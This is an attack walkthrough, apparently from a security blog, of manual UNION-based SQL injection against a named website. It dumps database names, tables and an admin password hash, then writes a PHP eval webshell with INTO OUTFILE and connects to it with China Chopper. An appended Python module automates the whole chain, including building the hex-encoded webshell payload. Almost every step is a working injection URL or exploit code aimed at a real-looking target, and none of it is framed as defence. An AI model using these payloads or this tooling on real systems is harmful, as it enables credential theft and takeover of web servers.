
MySQL manual injection walkthrough, plus writing a one-liner webshell directly

(1) Identify the injection point



Then test with and 1=1 and and 1=2: the former returns the page normally and the latter does not, which confirms the parameter is injectable. The next step is to work out how many columns the page's query returns.

(2) Count the columns

 http://unisscan.cn/list.php?lei=246 order by n-- 
 Increase n until the page breaks: the largest n that still returns normally is the column count, here 31. Keep the space after -- (MySQL only treats -- as a comment when whitespace follows it; if the browser strips the trailing space, use --+ or %23 instead).


(3) Find which columns are displayed on the page

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
The and 1=2 empties the original result set, so only the UNION row reaches the page; whichever numbers show up mark the columns that are rendered (here column 8, which is used for all the later reads).


(4) Start gathering information


http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,concat(user(),0x3a,database(),0x3a,version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


root@…:uniscan:5.0.67-community-nt (the host part of the user() output is mangled in the source)
(5) The connection runs as root and the server is MySQL 5.0, so the database names can be read from information_schema directly (it exists from 5.0 onward):

http://unisscan.cn/list.php?lei=246 and 1 = 2 union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+schema_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.schemata--


information_schema,mysql,unis_phpstat,uniscan,unisstat
(6) First go after the admin-panel password. Dump the tables of the uniscan database:

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+table_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.tables where table_schema=0x756E697363616E-- 
0x756E697363616E is the hex form of 'uniscan'; a hex literal needs no quote characters, so it gets through even when magic_quotes_gpc escapes quotes.


(7) There is an admin table, presumably the admin-panel users; list its columns:

http://unisscan.cn/list.php?lei=246 and 1=2  union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+column_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.columns where table_name=0x61646D696E--
0x61646D696E is 'admin'. This filters on table_name only, so columns of a same-named table in any other schema on the server would be mixed in; adding and table_schema=0x756E697363616E restricts it to the uniscan database.


id,username,password,quanxian,zhiwei,quanxian
(8) Read the id, username and password fields:

http://unisscan.cn/list.php?lei=246 and 1 =2 union%20select%201,2,3,4,5,6,7,concat(id,0x3a,username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20admin limit 0,1--
limit 0,1 returns the first row; step the offset (limit 1,1, limit 2,1, ...) to read the remaining accounts.


80:admin:74d1a2ceca6456a14b3a3ecfa0e499ff
Ran the hash through an online MD5 lookup and it did not crack, frustrating.
So the route of getting a shell through the admin panel had to be dropped.

(9) Since the admin-panel route failed, the next thing is to try to disclose the site's physical path; in the end a leftover phpinfo test page gave it away.


(10) With the physical path known this is straightforward: write a one-liner webshell directly with INTO OUTFILE.

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,%27%3C?php%20eval($_POST[cmd])?%3E%27,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20into%20outfile%20%27V:\web\php\php5\PHP_Web\phpstat3.2\one.php%27
This needs the FILE privilege (root has it), a directory the mysqld process can write to, and a target file that does not exist yet; newer servers additionally restrict or disable it through secure_file_priv. Two details to watch in the payload: inside a MySQL string literal a backslash starts an escape sequence, so write the Windows path with forward slashes (which Windows accepts) or doubled backslashes; and the shell can be supplied as a hex literal instead of a quoted string, so no quote characters are needed at all.



(11) Connect with 菜刀 (China Chopper), and it works.
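The steps above are the same mechanical sequence every time (probe the column count, find a rendered column, build a 31-wide UNION with one expression in the rendered slot, read the result back, then swap in a hex-encoded shell with INTO OUTFILE), so here is that sequence as working code. This is an added example, not code from the original post or the site it describes. It assumes a target that echoes query results into the page and that can be driven through a single callable (the `oracle`); the sqlite-backed `make_fake_target()` is a constructed stand-in with hypothetical data (5 columns, two of them rendered, an admin row whose hash is md5 of "password") so the module runs offline. Where MySQL syntax differs from sqlite (concat() versus ||, information_schema) the comments say so; against a real MySQL target the default MySQL forms apply.

```python
"""Added example (not from the original post): automating the UNION-based
steps of the walkthrough against any page that echoes query results.

Every function takes an `oracle` callable: it receives the injected value for
the `lei` parameter, returns the page body, and raises if the query errored.
`make_fake_target()` is a constructed sqlite stand-in for list.php
(hypothetical data, not the real site) so everything here runs offline.
"""
import re
import sqlite3
from typing import Callable, List, Optional

Oracle = Callable[[str], str]


def to_hex_literal(s: str) -> str:
    """'admin' -> 0x61646D696E: a quote-free string literal, as in steps (6)-(7)."""
    return "0x" + s.encode().hex().upper()


def union_payload(base: str, ncols: int, col: int, expr: str, tail: str = "") -> str:
    """Step (3): `<base> and 1=2 union select 1,..,<expr>,..,<ncols> <tail>-- `.
    The comment is written as `-- ` with the trailing space MySQL requires."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[col - 1] = expr
    return f"{base} and 1=2 union select {','.join(parts)} {tail}-- "


def count_columns(oracle: Oracle, base: str, limit: int = 64) -> int:
    """Step (2): ORDER BY n works while n <= column count and errors just past it."""
    for n in range(1, limit + 1):
        try:
            oracle(f"{base} order by {n}-- ")
        except Exception:
            return n - 1
    raise RuntimeError(f"still no error at order by {limit}")


def _tokens(body: str, i: int) -> int:
    """How many times the marker number i appears as a whole token."""
    return len(re.findall(rf"\b{i}\b", body))


def find_reflected_columns(oracle: Oracle, base: str, ncols: int) -> List[int]:
    """Step (3): which of the markers 1..ncols show up in the page.  Counts are
    compared against a baseline without the UNION so numbers already on the
    page (ids, dates) are not mistaken for markers."""
    baseline = oracle(f"{base} and 1=2-- ")
    body = oracle(union_payload(base, ncols, 1, "1"))  # plain 1,2,...,ncols
    return [i for i in range(1, ncols + 1) if _tokens(body, i) > _tokens(baseline, i)]


def extract(oracle: Oracle, base: str, ncols: int, col: int, expr: str,
            tail: str = "", wrap: Optional[Callable[[str], str]] = None) -> Optional[str]:
    """Steps (4)-(8): put `expr` in a rendered column, bracketed with [[ ]] so it
    can be cut out of the surrounding HTML, and return the text between them."""
    wrap = wrap or (lambda e: f"concat(0x5b5b,{e},0x5d5d)")  # MySQL form
    body = oracle(union_payload(base, ncols, col, wrap(expr), tail))
    m = re.search(r"\[\[(.*?)\]\]", body, re.S)
    return m.group(1) if m else None


def outfile_payload(base: str, ncols: int, col: int, shell: str, path: str) -> str:
    """Step (10): the shell goes in as a hex literal (no quotes for magic_quotes
    to mangle) and the path uses forward slashes, which Windows accepts and which
    keeps MySQL from treating backslashes in the literal as escape sequences.
    Server side this still needs FILE, a directory writable by mysqld and a
    file that does not exist yet."""
    safe_path = path.replace("\\", "/")
    return union_payload(base, ncols, col, to_hex_literal(shell),
                         tail=f"into outfile '{safe_path}'")


def make_fake_target() -> Oracle:
    """Constructed stand-in for list.php: a 5-column query of which the page
    renders columns 2 and 4.  Hypothetical data; the hash is md5('password')."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table list(lei int, c1 text, c2 text, c3 text, c4 text, c5 text);
        insert into list values (246, 'x', 'Product news', 'y', '2009-01-01', 'z');
        create table admin(id int, username text, password text);
        insert into admin values (80, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)

    def page(lei: str) -> str:
        # Deliberately unsanitized, like the vulnerable list.php.
        rows = db.execute(f"select c1,c2,c3,c4,c5 from list where lei={lei}").fetchall()
        return "\n".join(f"<h3>{r[1]}</h3><p>{r[3]}</p>" for r in rows)
    return page


def demo() -> dict:
    """Run the whole chain against the fake target and return what each step found."""
    oracle, base = make_fake_target(), "246"
    ncols = count_columns(oracle, base)
    shown = find_reflected_columns(oracle, base, ncols)
    creds = extract(oracle, base, ncols, shown[0],
                    "(select username||':'||password from admin limit 1)",
                    wrap=lambda e: f"'[['||{e}||']]'")  # sqlite has no concat()
    return {"ncols": ncols, "shown": shown, "creds": creds}


if __name__ == "__main__":
    print(demo())
    print(outfile_payload("246", 31, 8, "<?php eval($_POST[cmd])?>",
                          r"V:\web\php\php5\PHP_Web\phpstat3.2\one.php"))
```

Against a real target the `oracle` would wrap an HTTP request and raise whenever the response carries the error signature seen in step (1); everything else stays the same, and `outfile_payload("246", 31, 8, ...)` reproduces the step (10) request with the shell hex-encoded and the path made backslash-safe.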